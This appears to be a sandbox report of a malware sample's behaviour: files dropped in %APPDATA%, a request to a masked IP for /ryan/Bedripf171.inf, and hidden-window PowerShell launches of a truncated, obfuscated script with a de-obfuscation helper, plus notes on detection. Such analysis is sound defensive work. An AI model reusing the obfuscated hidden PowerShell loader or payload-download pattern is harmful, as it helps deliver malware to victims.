Technical Information
- %APPDATA%\bit64ca.tmp
- %APPDATA%\bit8d13.tmp
- %APPDATA%\bit64ca.tmp
- %APPDATA%\bit8d13.tmp
- from %APPDATA%\bit64ca.tmp to %APPDATA%\tarit.und
- from %APPDATA%\bit8d13.tmp to %APPDATA%\tarit.und
- 'microsoft.com':80
- '19#.#5.224.183':80
- http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
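- http://19#.#5.224.183/ryan/Bedripf171.inf
  Note: the '#' characters in this address appear to be masking applied in the listing, so the host cannot be matched as written; the URL path /ryan/Bedripf171.inf is the part that can be searched for in proxy or web logs. The microsoft.com request above fetches a Microsoft root certificate and is likely ordinary Windows certificate-chain retrieval rather than attacker infrastructure.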
- DNS ASK microsoft.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Krydd9 ([String]$Pragmatic){For($midiskirtp=1; $midiskirtp -lt $Pragmatic.Length-1; $midiskirtp+=(1+1)){$Aflseren=$Aflseren+$Pragmatic.Substring($midiskirtp, 1)};$Aflseren;}$Mingoto=K...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "Function Krydd9 ([String]$Pragmatic){For($midiskirtp=1; $midiskirtp -lt $Pragmatic.Length-1; $midiskirtp+=(1+1)){$Aflseren=$Aflseren+$Pragmatic.Substring($midiskirtp, 1)};$Aflseren;}$Mingoto=K...
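- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' "Function Krydd9 ([String]$Pragmatic){For($midiskirtp=1; $midiskirtp -lt $Pragmatic.Length-1; $midiskirtp+=(1+1)){$Aflseren=$Aflseren+$Pragmatic.Substring($midiskirtp, 1)};$Aflseren;}$Mingoto=K...
  Note: the command lines above are truncated in this listing ("..."). The visible function Krydd9 rebuilds a string from every second character of its argument (indexes 1, 3, 5, ... below Length-1), i.e. a string de-obfuscation helper; the rest of the script is not shown. For detection, the observable traits are PowerShell started with a hidden window, a long inline script passed on the command line, and the same script appearing under both the System32 and SysWOW64 PowerShell paths.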